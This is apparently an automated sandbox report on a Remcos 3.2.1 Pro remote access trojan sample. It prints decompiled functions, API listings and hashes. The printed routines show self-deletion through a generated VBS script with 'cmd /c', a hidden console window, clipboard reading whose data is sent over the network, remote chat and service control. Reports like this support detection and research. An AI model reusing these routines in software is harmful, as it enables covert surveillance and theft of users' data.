				E006D766C(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_t67 = E006D1EEB( &_v100);
				_t68 = E006D2489();
				if(E006E7947(E006D1EEB( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E006D1EEB( &_v100), 0x72f724, 0x72f724, 0) > 0x20) {
					ExitProcess(0);
				}
				E006D1EF0();
				E006D1EF0();
				return E006D1EF0();
			}





















                                    0x006db488
                                    0x006db493
                                    0x006db49f
                                    0x006db4a7
                                    0x006db4cb
                                    0x006db4d5
                                    0x006db4d7
                                    0x006db4e2
                                    0x006db4e2
                                    0x006db504
                                    0x006db50d
                                    0x006db515
                                    0x006db547
                                    0x006db550
                                    0x006db558
                                    0x006db560
                                    0x006db575
                                    0x006db5ba
                                    0x006db5c2
                                    0x006db5ca
                                    0x006db5d5
                                    0x006db5e0
                                    0x006db5eb
                                    0x006db5f8
                                    0x006db601
                                    0x006db60a
                                    0x006db628
                                    0x006db64d
                                    0x006db64d
                                    0x006db656
                                    0x006db65e
                                    0x006db670

                                    APIs
                                      • Part of subcall function 006E015B: TerminateProcess.KERNEL32(00000000,?,006DAD95), ref: 006E016B
                                      • Part of subcall function 006E015B: WaitForSingleObject.KERNEL32(000000FF,?,006DAD95), ref: 006E017E
                                      • Part of subcall function 006E0A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 006E0A4C
                                      • Part of subcall function 006E0A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 006E0A65
                                      • Part of subcall function 006E0A30: RegCloseKey.ADVAPI32(00000000), ref: 006E0A70
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 006DB4E2
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,0072F724,0072F724,00000000), ref: 006DB641
                                    • ExitProcess.KERNEL32 ref: 006DB64D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                    • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                    • API String ID: 1913171305-2411266221
                                    • Opcode ID: bcdfd1da23f3988aaa033fa4065c73ce46e2ed488cf34c0c1a264f1358abb193
                                    • Instruction ID: d1b133f586f50b0808df64660b0e1f4f659f7cd0b4b29ab159efa4701c7acaa0
                                    • Opcode Fuzzy Hash: bcdfd1da23f3988aaa033fa4065c73ce46e2ed488cf34c0c1a264f1358abb193
                                    • Instruction Fuzzy Hash: AE414371D141186BDB54F7A0EC62DEE777BAF61700F00012FF406A6292EE645E46CA98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070558A, Relevance: 16.6, APIs: 11, Instructions: 116COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0070558A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				char* _t31;
				int _t35;
				int _t43;
				void* _t51;
				int _t52;
				int _t54;
				void* _t56;
				void* _t63;
				short* _t64;
				short* _t67;

				_t62 = __edx;
				E00705507(_t51,  &_v28, __edx, _a24);
				_t52 = 0;
				_t54 =  *(_v24 + 0x14);
				_t31 = _a4;
				_v8 = _t54;
				if(_t31 == 0) {
					L4:
					 *((intOrPtr*)(E0070A504())) = 0x16;
					E0070695D();
					L18:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return _t52;
				}
				_t66 = _a8;
				if(_a8 == 0) {
					goto L4;
				}
				 *_t31 = 0;
				if(_a12 == 0 || _a16 == 0) {
					goto L4;
				} else {
					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
					_v12 = _t35;
					if(_t35 != 0) {
						_t64 = E0070F98C(_t54, _t35 + _t35);
						_t56 = _t63;
						if(_t64 != 0) {
							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
								_t67 = E0070F98C(_t56, _t66 + _t66);
								if(_t67 != 0) {
									_t43 = E00711453(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
									_v12 = _t43;
									if(_t43 != 0) {
										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
											_t52 = _v12;
										} else {
											E0070A4CE(GetLastError());
										}
									}
								}
								E007101F5(_t67);
							} else {
								E0070A4CE(GetLastError());
							}
						}
						E007101F5(_t64);
					} else {
						E0070A4CE(GetLastError());
					}
					goto L18;
				}
			}



















                                    0x0070558a
                                    0x0070559a
                                    0x007055a2
                                    0x007055a4
                                    0x007055a7
                                    0x007055aa
                                    0x007055af
                                    0x007055c4
                                    0x007055c9
                                    0x007055cf
                                    0x007056a1
                                    0x007056a5
                                    0x007056aa
                                    0x007056aa
                                    0x007056b8
                                    0x007056b8
                                    0x007055b1
                                    0x007055b6
                                    0x00000000
                                    0x00000000
                                    0x007055b8
                                    0x007055bd
                                    0x00000000
                                    0x007055d9
                                    0x007055e2
                                    0x007055e8
                                    0x007055ed
                                    0x0070560a
                                    0x0070560c
                                    0x0070560f
                                    0x0070562a
                                    0x00705643
                                    0x00705648
                                    0x00705658
                                    0x00705660
                                    0x00705665
                                    0x0070567e
                                    0x0070568f
                                    0x00705680
                                    0x00705687
                                    0x0070568c
                                    0x0070567e
                                    0x00705665
                                    0x00705693
                                    0x0070562c
                                    0x00705633
                                    0x00705633
                                    0x00705698
                                    0x0070569a
                                    0x007055ef
                                    0x007055f6
                                    0x007055fb
                                    0x00000000
                                    0x007055ed

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,006D1D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 007055E2
                                    • GetLastError.KERNEL32(?,?,006D1D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 007055EF
                                    • __dosmaperr.LIBCMT ref: 007055F6
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,006D1D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00705622
                                    • GetLastError.KERNEL32(?,?,?,006D1D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0070562C
                                    • __dosmaperr.LIBCMT ref: 00705633
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,006D1D39,?), ref: 00705676
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,006D1D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00705680
                                    • __dosmaperr.LIBCMT ref: 00705687
                                    • _free.LIBCMT ref: 00705693
                                    • _free.LIBCMT ref: 0070569A
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                    • String ID:
                                    • API String ID: 2441525078-0
                                    • Opcode ID: c4da37877533cc31edeb61b8f075563da9d58036e6ad65e7b4c8227bb99d4687
                                    • Instruction ID: b44ae24e6a4ab77e5cecea2b284017dbb9f50157e5db767d3e10d66352549515
                                    • Opcode Fuzzy Hash: c4da37877533cc31edeb61b8f075563da9d58036e6ad65e7b4c8227bb99d4687
                                    • Instruction Fuzzy Hash: 95318B7280064AFFDF11AFA4CC49DAF7BA9AF05720B504258F914961D0DB3E8D61DFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D53ED, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E006D53ED(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t28;
				char* _t36;
				intOrPtr _t45;
				intOrPtr _t46;
				void* _t57;
				intOrPtr _t69;
				void* _t111;
				void* _t113;
				void* _t115;
				signed int _t117;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;

				_t125 = __eflags;
				_t101 = __edx;
				_t69 = _a4;
				E006D20EC(_t69,  &_v104, __edx, __eflags, _t69 + 0x1c);
				SetEvent( *(_t69 + 0x34));
				_t28 = E006D1F95( &_v108);
				E006D42A6( &_v108,  &_v60, 4, 0xffffffff);
				_t120 = (_t117 & 0xfffffff8) - 0x5c;
				E006D20EC(_t69, _t120, _t101, _t125, 0x73c238);
				_t121 = _t120 - 0x18;
				E006D20EC(_t69, _t121, _t101, _t125,  &_v76);
				E006E7478( &_v140, _t101);
				_t122 = _t121 + 0x30;
				_t111 =  *_t28 - 0x3a;
				if(_t111 == 0) {
					E006D1E49( &_v116, _t101, __eflags, 0);
					_t36 = E006D2489();
					E006D1F95(E006D1E49( &_v120, _t101, __eflags, 0));
					_t101 = _t36;
					_t113 = E006DF69B();
					__eflags = _t113;
					if(_t113 == 0) {
						L7:
						E006D1E74( &_v116, _t101);
						E006D1FC7();
						E006D1FC7();
						__eflags = 0;
						return 0;
					}
					 *0x73baec = E006DF931(_t113, "DisplayMessage");
					_t45 = E006DF931(_t113, "GetMessage");
					_t104 = "CloseChat";
					 *0x73bae4 = _t45;
					_t46 = E006DF931(_t113, "CloseChat");
					_t123 = _t122 - 0x18;
					 *0x73bae8 = _t46;
					 *0x73bae1 = 1;
					E006D20EC(_t69, _t123, "CloseChat", __eflags, 0x73c2b8);
					_push(0x74);
					E006D4AA4(_t69, _t69, _t104, __eflags);
					L10:
					_t115 = HeapCreate(0, 0, 0);
					__eflags =  *0x73bae4(_t115,  &_v140);
					if(__eflags != 0) {
						_t123 = _t123 - 0x18;
						E006D20AB(_t69, _t123, _t104, __eflags, _v140, _t51);
						_push(0x3b);
						E006D4AA4(_t69, _t69, _t104, __eflags);
						HeapFree(_t115, 0, _v176);
					}
					goto L10;
				}
				_t127 = _t111 != 1;
				if(_t111 != 1) {
					goto L7;
				}
				_t57 =  *0x73baec(E006D1F95(E006D1E49( &_v116, _t101, _t127, 0)));
				_t128 = _t57;
				if(_t57 == 0) {
					goto L7;
				}
				E006D427F(_t69,  &_v80, 0x72f6b8);
				_t101 =  &_v84;
				E006E739C(_t69, _t122 - 0x18,  &_v84);
				_push(0x3b);
				E006D4AA4(_t69, _t69,  &_v84, _t128);
				E006D1EF0();
				L4:
				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}
































                                    0x006d53ed
                                    0x006d53ed
                                    0x006d53fb
                                    0x006d5404
                                    0x006d540c
                                    0x006d5416
                                    0x006d542a
                                    0x006d542f
                                    0x006d5439
                                    0x006d543e
                                    0x006d5448
                                    0x006d5451
                                    0x006d5456
                                    0x006d5459
                                    0x006d545c
                                    0x006d550b
                                    0x006d5512
                                    0x006d5525
                                    0x006d552a
                                    0x006d5533
                                    0x006d5535
                                    0x006d5537
                                    0x006d54e0
                                    0x006d54e4
                                    0x006d54ed
                                    0x006d54f6
                                    0x006d54fd
                                    0x006d5503
                                    0x006d5503
                                    0x006d554a
                                    0x006d5551
                                    0x006d5556
                                    0x006d555b
                                    0x006d5562
                                    0x006d5567
                                    0x006d556a
                                    0x006d5571
                                    0x006d557d
                                    0x006d5582
                                    0x006d5586
                                    0x006d558b
                                    0x006d5594
                                    0x006d55a4
                                    0x006d55a6
                                    0x006d55a8
                                    0x006d55b2
                                    0x006d55b7
                                    0x006d55bb
                                    0x006d55c6
                                    0x006d55c6
                                    0x00000000
                                    0x006d55a6
                                    0x006d5462
                                    0x006d5465
                                    0x00000000
                                    0x00000000
                                    0x006d547b
                                    0x006d5482
                                    0x006d5484
                                    0x00000000
                                    0x00000000
                                    0x006d548f
                                    0x006d5497
                                    0x006d549d
                                    0x006d54a2
                                    0x006d54a6
                                    0x006d54af
                                    0x00000000
                                    0x006d54b4
                                    0x006d54cb
                                    0x006d54d6
                                    0x006d54d6
                                    0x006d54de
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 006D540C
                                    • GetMessageA.USER32 ref: 006D54BC
                                    • TranslateMessage.USER32(?), ref: 006D54CB
                                    • DispatchMessageA.USER32 ref: 006D54D6
                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0073C2B8), ref: 006D558E
                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 006D55C6
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                    • API String ID: 2956720200-749203953
                                    • Opcode ID: 2bf495a2b348a700319fbc958722bf78542b9bc87cd77b7f459b4910d88e3049
                                    • Instruction ID: 109f2e6225d7cb3ca953ffacce21d0c0fa99533a75632c9054b89d7b35b47a4a
                                    • Opcode Fuzzy Hash: 2bf495a2b348a700319fbc958722bf78542b9bc87cd77b7f459b4910d88e3049
                                    • Instruction Fuzzy Hash: FC41D231E04601ABC754FB74DC5686F7BEAAB86700F40452EF90297792EF388A05C79A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E805B, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E006E805B(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
				E006D1F6D(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t85 = _t36 - 7;
				if(_t36 <= 7) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M006E8237))) {
						case 0:
							_push(L"Temp");
							goto L14;
						case 1:
							__ecx =  &_v620;
							__eax = E006E6D45(__ebx,  &_v620);
							__ecx =  &_v644;
							__eax = E006D1EFA( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L14;
						case 3:
							_push(L"WinDir");
							goto L14;
						case 4:
							__eax = E006E7614(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E006D427F(__ebx, __ecx, L"\\SysWOW64") = E0070987F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = E006D3030( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = E006D1EFA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = E006D1EF0();
								__ecx =  &_v608;
								__eax = E006D1EF0();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E006D427F(__ebx, __ecx, L"\\system32") = E0070987F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = E006D3030( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = E006D1EFA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = E006D1EF0();
								__ecx =  &_v608;
								__eax = E006D1EF0();
								__ecx =  &_v584;
								L5:
								__eax = E006D1EF0();
								goto L15;
							}
							L16:
						case 5:
							_push(L"ProgramFiles");
							goto L14;
						case 6:
							_push(L"AppData");
							goto L14;
						case 7:
							_push(L"UserProfile");
							L14:
							E006D9DC9(_t54,  &_v644, E0070987F(_t54, _t57, _t85));
							goto L15;
					}
				}
				L15:
				__imp__GetLongPathNameW(E006D1EEB( &_v644),  &_v524, 0x208);
				_t39 = E006D427F(_t54,  &_v560, _a4);
				_t40 = E006D427F(_t54,  &_v636, "\\");
				E006D3030(_t77, E006D3030( &_v600, E006E83F4(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
				E006D1EF0();
				E006D1EF0();
				E006D1EF0();
				E006D1EF0();
				E006D1EF0();
				return _t77;
				goto L16;
			}



























                                    0x006e805b
                                    0x006e806a
                                    0x006e806c
                                    0x006e8072
                                    0x006e807a
                                    0x006e807d
                                    0x006e8080
                                    0x006e8086
                                    0x00000000
                                    0x006e808d
                                    0x00000000
                                    0x00000000
                                    0x006e8097
                                    0x006e809b
                                    0x006e80a1
                                    0x006e80a5
                                    0x00000000
                                    0x00000000
                                    0x006e80b8
                                    0x00000000
                                    0x00000000
                                    0x006e80c2
                                    0x00000000
                                    0x00000000
                                    0x006e80cc
                                    0x006e80d1
                                    0x006e80d3
                                    0x006e812c
                                    0x006e813b
                                    0x006e8142
                                    0x006e814b
                                    0x006e814d
                                    0x006e8151
                                    0x006e8158
                                    0x006e815c
                                    0x006e8161
                                    0x006e8165
                                    0x006e816a
                                    0x006e816e
                                    0x006e80aa
                                    0x006e80aa
                                    0x00000000
                                    0x006e80d5
                                    0x006e80da
                                    0x006e80e9
                                    0x006e80f0
                                    0x006e80f9
                                    0x006e80fb
                                    0x006e80ff
                                    0x006e8106
                                    0x006e810a
                                    0x006e810f
                                    0x006e8113
                                    0x006e8118
                                    0x006e811c
                                    0x006e8121
                                    0x006e80ae
                                    0x006e80ae
                                    0x00000000
                                    0x006e80ae
                                    0x00000000
                                    0x00000000
                                    0x006e8178
                                    0x00000000
                                    0x00000000
                                    0x006e817f
                                    0x00000000
                                    0x00000000
                                    0x006e8186
                                    0x006e818b
                                    0x006e8196
                                    0x00000000
                                    0x00000000
                                    0x006e8086
                                    0x006e819b
                                    0x006e81b2
                                    0x006e81c1
                                    0x006e81d0
                                    0x006e81f8
                                    0x006e8202
                                    0x006e820b
                                    0x006e8214
                                    0x006e821d
                                    0x006e8226
                                    0x006e8233
                                    0x00000000

                                    APIs
                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 006E81B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                    • API String ID: 82841172-1609423294
                                    • Opcode ID: 8c21b4ccf1d7ef676d74704ebca54289c0ff4b1f4f2ed080e74eeafc24a12998
                                    • Instruction ID: 57db69d0c6b6076d3202652d69dc8e29503de1a906410b92b411ef62f3c55dc9
                                    • Opcode Fuzzy Hash: 8c21b4ccf1d7ef676d74704ebca54289c0ff4b1f4f2ed080e74eeafc24a12998
                                    • Instruction Fuzzy Hash: DE418971518380AFD244F761DC52CAFB3ABAEA1740F10092EF856572E2EE749E0AC656
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DAF74, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 111COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(?,open,00000000,0072F724,0072F724), ref: 006DB0D4
                                    • ExitProcess.KERNEL32 ref: 006DB0DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteExitProcessShell
                                    • String ID: ")$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1124553745-1689998264
                                    • Opcode ID: a251feea6881335c88f37454ca3f049beece1eb890b20897489df2b4af37195d
                                    • Instruction ID: 1c4d0c780e8553aa3f041cfd62a354137e83f0f6d47f86679c12664b20a384a9
                                    • Opcode Fuzzy Hash: a251feea6881335c88f37454ca3f049beece1eb890b20897489df2b4af37195d
                                    • Instruction Fuzzy Hash: 99312E71D14158ABCB55F7A0ECA6CEE737BAE61700F00012FF816673D2EE602E46C698
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E8F59, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 89memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 59%
                                    			E006E8F59(void* __ebx, void* __ecx, void* __edx) {
				char _v204;
				void* __edi;
				struct HWND__* _t17;
				void _t22;
				intOrPtr _t24;
				intOrPtr _t25;
				void _t26;
				void _t28;
				void* _t30;
				void* _t34;
				signed int _t37;
				void* _t45;
				void* _t47;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t59;

				_t36 = __ecx;
				_t34 = __ecx;
				AllocConsole();
				_t17 =  *0x73ca84(__ebx);
				 *0x73bebc = _t17;
				if(_t34 == 0) {
					ShowWindow(_t17, 0);
				}
				_push(_t45);
				E0070BCA5(_t36, "CONOUT$", "a", E00706A85(1));
				E00701F00(_t45,  &_v204, 0, 0xc8);
				_t47 =  &_v204 - 1;
				do {
					_t22 =  *(_t47 + 1);
					_t47 = _t47 + 1;
				} while (_t22 != 0);
				_t37 = 7;
				memcpy(_t47, "--------------------------\n", _t37 << 2);
				_t51 =  &_v204 - 1;
				do {
					_t24 =  *((intOrPtr*)(_t51 + 1));
					_t51 = _t51 + 1;
				} while (_t24 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t53 =  &_v204 - 1;
				do {
					_t25 =  *((intOrPtr*)(_t53 + 1));
					_t53 = _t53 + 1;
				} while (_t25 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 =  &_v204 - 1;
				do {
					_t26 =  *(_t55 + 1);
					_t55 = _t55 + 1;
				} while (_t26 != 0);
				_push(6);
				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
				asm("movsw");
				_t59 =  &_v204 - 1;
				do {
					_t28 =  *(_t59 + 1);
					_t59 = _t59 + 1;
					_t85 = _t28;
				} while (_t28 != 0);
				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
				asm("movsb");
				return E006D482E(_t85, _t30, 7);
			}




















                                    0x006e8f59
                                    0x006e8f63
                                    0x006e8f65
                                    0x006e8f6b
                                    0x006e8f73
                                    0x006e8f79
                                    0x006e8f7e
                                    0x006e8f7e
                                    0x006e8f85
                                    0x006e8f98
                                    0x006e8fab
                                    0x006e8fb9
                                    0x006e8fba
                                    0x006e8fba
                                    0x006e8fbd
                                    0x006e8fbe
                                    0x006e8fc4
                                    0x006e8fca
                                    0x006e8fd2
                                    0x006e8fd3
                                    0x006e8fd3
                                    0x006e8fd6
                                    0x006e8fd7
                                    0x006e8fe0
                                    0x006e8fe1
                                    0x006e8fe2
                                    0x006e8fe9
                                    0x006e8fea
                                    0x006e8fea
                                    0x006e8fed
                                    0x006e8fee
                                    0x006e8ff7
                                    0x006e8ff8
                                    0x006e8ff9
                                    0x006e9001
                                    0x006e9002
                                    0x006e9002
                                    0x006e9005
                                    0x006e9006
                                    0x006e900a
                                    0x006e9012
                                    0x006e9014
                                    0x006e901c
                                    0x006e901d
                                    0x006e901d
                                    0x006e9020
                                    0x006e9021
                                    0x006e9021
                                    0x006e9033
                                    0x006e9036
                                    0x006e9042

                                    APIs
                                    • AllocConsole.KERNEL32(00000001), ref: 006E8F65
                                    • GetConsoleWindow.KERNEL32 ref: 006E8F6B
                                    • ShowWindow.USER32(00000000,00000000), ref: 006E8F7E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ConsoleWindow$AllocShow
                                    • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.2.1 Pro$CONOUT$
                                    • API String ID: 3461962499-1433448479
                                    • Opcode ID: d7e9f75a28b0f9b673c527a06bb318d09f4a9f07fcc74a353b67d647bb101d43
                                    • Instruction ID: 5bc5b3ea0a1dc71ef06f09c4e74b5159b1ac3df033b7532c8cbcf81bff710b9e
                                    • Opcode Fuzzy Hash: d7e9f75a28b0f9b673c527a06bb318d09f4a9f07fcc74a353b67d647bb101d43
                                    • Instruction Fuzzy Hash: 19217C32909B415AFF209F155C05FC6BB9BAF52740F404291F88C7F182CFA62D8A4BB4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E2D6D, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49clipboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32 ref: 006E2D6E
                                    • EmptyClipboard.USER32 ref: 006E2D7C
                                    • CloseClipboard.USER32 ref: 006E2D82
                                    • OpenClipboard.USER32 ref: 006E2D89
                                    • GetClipboardData.USER32 ref: 006E2D99
                                    • GlobalLock.KERNEL32 ref: 006E2DA2
                                    • GlobalUnlock.KERNEL32(00000000), ref: 006E2DAB
                                    • CloseClipboard.USER32 ref: 006E2DB1
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                    • String ID: 8Em
                                    • API String ID: 2172192267-1798622111
                                    • Opcode ID: cf75a23305c89af3299c0825166c37ba4ea22b95d072e528124f6f36cc5532e5
                                    • Instruction ID: 4cd25c4044bd87502e117474a6fcab270924c749afe4f001818b51264bb0638c
                                    • Opcode Fuzzy Hash: cf75a23305c89af3299c0825166c37ba4ea22b95d072e528124f6f36cc5532e5
                                    • Instruction Fuzzy Hash: 9A0144316043509BC354FB71DC49AAEB7A6BF95301F40452EF856C63A2DF788B06CA59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E6472, Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,006E5E19,00000000), ref: 006E6481
                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,006E5E19,00000000), ref: 006E6498
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5E19,00000000), ref: 006E64A5
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,006E5E19,00000000), ref: 006E64B4
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5E19,00000000), ref: 006E64C5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,006E5E19,00000000), ref: 006E64C8
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 2a6e7e159091bc8f0a23fb250dfb5f905aaa6614f92fb3340813bb1afe896aac
                                    • Instruction ID: 9de49106d414b0cf12f5842d4eb8afb3386eef74dafc16a2ae31aec4135de138
                                    • Opcode Fuzzy Hash: 2a6e7e159091bc8f0a23fb250dfb5f905aaa6614f92fb3340813bb1afe896aac
                                    • Instruction Fuzzy Hash: 8D11E931A4121CBFD630AB65DC85DBF3B7EDB523917008015F91592280EB6C4E0796B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00711BEE, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00711C02
                                      • Part of subcall function 007101F5: HeapFree.KERNEL32(00000000,00000000,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?), ref: 0071020B
